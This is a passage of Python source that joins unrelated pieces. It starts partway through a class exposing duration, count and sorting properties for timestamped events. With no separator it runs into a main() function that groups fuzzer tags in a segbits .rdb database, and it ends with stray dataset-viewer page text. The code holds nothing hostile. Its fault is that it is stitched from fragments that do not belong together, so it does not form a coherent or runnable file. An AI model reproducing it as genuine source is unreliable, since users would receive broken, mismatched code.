        # Explicit override wins; otherwise derived from the timestamps.
        if self._duration is None:
            return (self.end_timestamp - self.start_timestamp).total_seconds()
        return self._duration

    @duration.setter
    def duration(self, value):
        self._duration = value

    @property
    def count(self):
        return len(self._events)

    @property
    def count_clips(self):
        total = 0
        for _, event_info in self.items:
            total += event_info.count
        return total

    @property
    def sorted(self):
        # Event keys ordered by each event's start timestamp.
        return sorted(self._events, key=lambda clip: self._events[clip].start_timestamp)
def main():
    """Group fuzzer tags in a segbits (.rdb) database and save the result."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', required=True, type=str, help='Input .rdb file')
    parser.add_argument('-g', required=True, type=str, help='Input tag group definition file')
    parser.add_argument('-o', required=True, type=str, help='Output .rdb file')
    args = parser.parse_args()

    tag_groups = load_tag_groups(args.g)
    segbits = load_segbits(args.i)
    # Determine the bits shared by each tag group, rewrite the tags
    # accordingly, then persist the grouped database.
    common_bits = find_common_bits_for_tag_groups(segbits, tag_groups)
    grouped = group_tags(segbits, tag_groups, common_bits)
    save_segbits(args.o, grouped)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.